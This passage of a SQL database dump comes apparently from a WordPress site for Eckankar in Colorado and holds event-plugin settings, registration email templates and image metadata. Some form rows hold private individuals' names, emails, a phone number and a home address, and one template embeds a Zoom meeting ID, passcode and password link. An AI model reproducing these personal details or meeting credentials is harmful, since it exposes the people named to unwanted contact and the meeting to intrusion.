Springs'),(181196,268393,'_field_36','CO'),(181197,268393,'_field_37','US'),(181198,268393,'_field_39',''),(181199,268393,'_form_id','4'),(181200,268393,'_seq_num','33'),(181201,268394,'_field_179','Christopher'),(181202,268394,'_field_180','Taylor'),(181203,268394,'_field_181','christaylr@att.net'),(181204,268394,'_field_182','CO'),(181205,268394,'_field_183','US'),(181206,268394,'_field_184','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(181207,268394,'_form_id','17'),(181208,268394,'_seq_num','16'),(181209,268396,'_field_224','Adrienne '),(181210,268396,'_field_225','Hodgesfogel '),(181211,268396,'_field_226','ndsgermain1957@gmail.com'),(181212,268396,'_field_227','CO'),(181213,268396,'_field_228','US'),(181214,268396,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(181215,268396,'_form_id','21'),(181216,268396,'_seq_num','169'),(181217,268397,'_field_496','David'),(181218,268397,'_field_497','Newton'),(181219,268397,'_field_498','(970) 988-2423'),(181220,268397,'_field_499','dnewtdata@gmail.com'),(181221,268397,'_field_500','888 Bavaria Hills Terrace'),(181222,268397,'_field_501','Chaska'),(181223,268397,'_field_502','MN'),(181224,268397,'_field_503','US'),(181225,268397,'_field_505','I have moved from Colorado, not sure what you will do about removing me from your area.  Thanks,  David '),(181226,268397,'_form_id','53'),(181227,268397,'_seq_num','10'),(183709,268530,'mec_reg_fields_global_inheritance','1'),(183710,268530,'mec_reg_fields','a:0:{}'),(183711,268530,'mec_bfixed_fields','a:0:{}'),(183712,268530,'mec_op','a:0:{}'),(183713,268530,'mec_fields','a:0:{}'),(183714,268530,'mec_event_status','EventScheduled'),(183715,268530,'mec_moved_online_link',''),(183716,268530,'mec_cancelled_reason',''),(183717,268530,'mec_display_cancellation_reason_in_single_page',''),(183718,268530,'boldgrid_hide_page_title','0'),(183719,268530,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183688,268530,'mec_end_date','2023-06-17'),(183689,268530,'mec_end_time_hour','2'),(183690,268530,'mec_end_time_minutes','30'),(183687,268530,'mec_start_day_seconds','48600'),(183685,268530,'mec_start_time_minutes','30'),(183686,268530,'mec_start_time_ampm','PM'),(185914,268691,'original-file','2023/06/sa-events-img-2-updraft-pre-smush-original.jpg'),(181391,268410,'mec_color',''),(181392,268410,'mec_location_id','185'),(181393,268410,'mec_dont_show_map','0'),(181394,268410,'mec_organizer_id','1'),(181395,268410,'mec_read_more',''),(181396,268410,'mec_more_info',''),(181397,268410,'mec_more_info_title',''),(181398,268410,'mec_more_info_target','_self'),(181399,268410,'mec_cost',''),(181400,268410,'mec_currency','a:0:{}'),(181401,268410,'mec_additional_organizer_ids','a:0:{}'),(181402,268410,'mec_additional_location_ids','a:0:{}'),(181403,268410,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-14\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181404,268410,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181405,268410,'mec_certain_weekdays','a:0:{}'),(181406,268410,'mec_allday','0'),(181407,268410,'one_occurrence','0'),(181408,268410,'mec_hide_time','0'),(181409,268410,'mec_hide_end_time','0'),(181410,268410,'mec_comment',''),(181411,268410,'mec_timezone','global'),(181412,268410,'mec_countdown_method','global'),(181413,268410,'mec_public','1'),(181414,268410,'mec_start_date','2023-05-14'),(181415,268410,'mec_start_time_hour','10'),(181416,268410,'mec_start_time_minutes','30'),(181417,268410,'mec_start_time_ampm','AM'),(181418,268410,'mec_start_day_seconds','37800'),(181419,268410,'mec_end_date','2023-05-14'),(181420,268410,'mec_end_time_hour','11'),(181421,268410,'mec_end_time_minutes','30'),(181422,268410,'mec_end_time_ampm','AM'),(181423,268410,'mec_end_day_seconds','41400'),(181424,268410,'mec_repeat_status','0'),(181425,268410,'mec_repeat_type',''),(181426,268410,'mec_repeat_interval','1'),(181427,268410,'mec_repeat_end',''),(181428,268410,'mec_repeat_end_at_occurrences',''),(181429,268410,'mec_repeat_end_at_date',''),(181430,268410,'mec_advanced_days','a:0:{}'),(181431,268410,'mec_in_days',''),(181432,268410,'mec_not_in_days',''),(181433,268410,'mec_hourly_schedules','a:0:{}'),(181434,268410,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181435,268410,'mec_tickets','a:0:{}'),(183931,268564,'_form_id','21'),(183932,268564,'_seq_num','174'),(181467,268411,'mec_color',''),(181468,268411,'mec_location_id','185'),(181469,268411,'mec_dont_show_map','0'),(181470,268411,'mec_organizer_id','1'),(181471,268411,'mec_read_more',''),(181472,268411,'mec_more_info',''),(181436,268410,'mec_fees_global_inheritance','1'),(181437,268410,'mec_fees','a:0:{}'),(181438,268410,'mec_ticket_variations_global_inheritance','1'),(181439,268410,'mec_ticket_variations','a:0:{}'),(181440,268410,'mec_reg_fields_global_inheritance','1'),(181441,268410,'mec_reg_fields','a:0:{}'),(181442,268410,'mec_bfixed_fields','a:0:{}'),(181443,268410,'mec_op','a:0:{}'),(181444,268410,'mec_fields','a:0:{}'),(181445,268410,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(181446,268410,'mec_event_status','EventScheduled'),(181447,268410,'mec_moved_online_link',''),(181448,268410,'mec_cancelled_reason',''),(181449,268410,'mec_display_cancellation_reason_in_single_page',''),(181450,268410,'protect_children',''),(181451,268410,'passster_activate_global_protection',NULL),(181452,268410,'passster_activate_protection',NULL),(181453,268410,'passster_protection_type','password'),(181454,268410,'boldgrid_hide_page_title','0'),(181455,268410,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(181456,268410,'boldgrid_in_page_containers','1'),(181458,268410,'_wp_old_date','2022-04-30'),(181459,268410,'passster_area_shortcode',''),(181461,268410,'_dp_original','268409'),(181462,268410,'_edit_lock','1682457332:2'),(181463,268410,'_edit_last','2'),(181522,268411,'mec_event_status','EventScheduled'),(181523,268411,'mec_moved_online_link',''),(181524,268411,'mec_cancelled_reason',''),(181525,268411,'mec_display_cancellation_reason_in_single_page',''),(181526,268411,'protect_children',''),(181527,268411,'passster_activate_global_protection',NULL),(181528,268411,'passster_activate_protection',NULL),(181529,268411,'passster_protection_type','password'),(181530,268411,'boldgrid_hide_page_title','0'),(181531,268411,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(181532,268411,'boldgrid_in_page_containers','1'),(181533,268411,'_thumbnail_id','266063'),(181534,268411,'_wp_old_date','2022-04-30'),(181535,268411,'passster_area_shortcode',''),(181537,268411,'_dp_original','268410'),(181538,268411,'_edit_lock','1690649177:2'),(181539,268411,'_edit_last','2'),(185908,268687,'_field_137','Looking'),(183659,268530,'protect_children',''),(183660,268530,'mec_color',''),(183661,268530,'mec_location_id','166'),(183662,268530,'mec_dont_show_map','0'),(183663,268530,'mec_organizer_id','1'),(183664,268530,'mec_read_more',''),(183665,268530,'mec_more_info',''),(183666,268530,'mec_more_info_title',''),(183667,268530,'mec_more_info_target','_self'),(183668,268530,'mec_cost',''),(183669,268530,'mec_currency','a:0:{}'),(183670,268530,'mec_additional_organizer_ids','a:0:{}'),(183671,268530,'mec_additional_location_ids','a:0:{}'),(183672,268530,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-17\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-17\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183673,268530,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183674,268530,'mec_certain_weekdays','a:0:{}'),(183675,268530,'mec_allday','0'),(183676,268530,'one_occurrence','0'),(183677,268530,'mec_hide_time','0'),(183678,268530,'mec_hide_end_time','0'),(183679,268530,'mec_comment',''),(183680,268530,'mec_timezone','global'),(183681,268530,'mec_countdown_method','global'),(183682,268530,'mec_public','1'),(183683,268530,'mec_start_date','2023-06-17'),(183684,268530,'mec_start_time_hour','1'),(183634,268518,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:898254;s:12:\"smushed-size\";i:826708;s:15:\"savings-percent\";d:7.96999999999999975131004248396493494510650634765625;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:898254;s:10:\"compressed\";i:826708;}s:6:\"medium\";a:2:{s:8:\"original\";i:20395;s:10:\"compressed\";i:19739;}s:5:\"large\";a:2:{s:8:\"original\";i:210806;s:10:\"compressed\";i:202366;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8805;s:10:\"compressed\";i:8805;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:121710;s:10:\"compressed\";i:116891;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:32538;s:10:\"compressed\";i:31556;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:58767;s:10:\"compressed\";i:56474;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:39636;s:10:\"compressed\";i:38110;}s:8:\"tileview\";a:2:{s:8:\"original\";i:40064;s:10:\"compressed\";i:38954;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:451420;s:10:\"compressed\";i:433758;}}}'),(192737,269144,'mec_start_date','2023-10-15'),(192736,269144,'mec_public','1'),(192735,269144,'mec_trailer_title',''),(192734,269144,'mec_trailer_url',''),(192733,269144,'mec_style_per_event','global'),(192732,269144,'mec_countdown_method','global'),(192731,269144,'mec_timezone','global'),(192730,269144,'mec_comment',''),(192729,269144,'mec_hide_end_time','0'),(192728,269144,'mec_hide_time','0'),(183633,268518,'smush-info','The file was compressed from 877.20 KB to 807.33 KB saving 7.97 percent using WP-Optimize'),(183632,268518,'smush-complete','1'),(183631,268518,'original-file','2022/03/mountain-stream-4op-updraft-pre-smush-original.jpg'),(183534,268462,'smush-info','The file was compressed from 55.64 KB to 55.64 KB saving 0 percent using WP-Optimize'),(183536,268462,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:56977;s:12:\"smushed-size\";i:56977;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:6:{s:6:\"medium\";a:2:{s:8:\"original\";i:10962;s:10:\"compressed\";i:10962;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5445;s:10:\"compressed\";i:5379;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14695;s:10:\"compressed\";i:14695;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:25652;s:10:\"compressed\";i:25652;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19119;s:10:\"compressed\";i:19119;}s:8:\"tileview\";a:2:{s:8:\"original\";i:16121;s:10:\"compressed\";i:16121;}}}'),(183535,268462,'smush-complete','1'),(188195,268837,'mec_start_time_hour','1'),(188196,268837,'mec_start_time_minutes','0'),(188192,268837,'mec_countdown_method','global'),(188193,268837,'mec_public','1'),(188194,268837,'mec_start_date','2023-08-16'),(188191,268837,'mec_timezone','global'),(185905,268687,'_field_133','Maryssa'),(188188,268837,'mec_hide_time','0'),(188189,268837,'mec_hide_end_time','0'),(188190,268837,'mec_comment',''),(188187,268837,'one_occurrence','0'),(188170,268837,'protect_children',''),(188171,268837,'mec_color',''),(188172,268837,'mec_location_id','198'),(188185,268837,'mec_certain_weekdays','a:0:{}'),(188186,268837,'mec_allday','0'),(188184,268837,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191690,269043,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:615728;s:12:\"smushed-size\";i:587713;s:15:\"savings-percent\";d:4.54999999999999982236431605997495353221893310546875;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:615728;s:10:\"compressed\";i:587713;}s:6:\"medium\";a:2:{s:8:\"original\";i:28273;s:10:\"compressed\";i:27357;}s:5:\"large\";a:2:{s:8:\"original\";i:194865;s:10:\"compressed\";i:188023;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10236;s:10:\"compressed\";i:10170;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:117046;s:10:\"compressed\";i:112728;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:35787;s:10:\"compressed\";i:34495;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:88954;s:10:\"compressed\";i:85757;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:58546;s:10:\"compressed\";i:56490;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:40147;s:10:\"compressed\";i:38682;}s:8:\"tileview\";a:2:{s:8:\"original\";i:45350;s:10:\"compressed\";i:43700;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:374394;s:10:\"compressed\";i:364231;}}}'),(191683,269043,'_wp_attached_file','2023/09/fall-bridge-over-water-1.jpg'),(191684,269043,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:36:\"2023/09/fall-bridge-over-water-1.jpg\";s:8:\"filesize\";i:615728;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28273;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"fall-bridge-over-water-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194865;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10236;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"fall-bridge-over-water-1-768x432.jpg\";s:5:\"w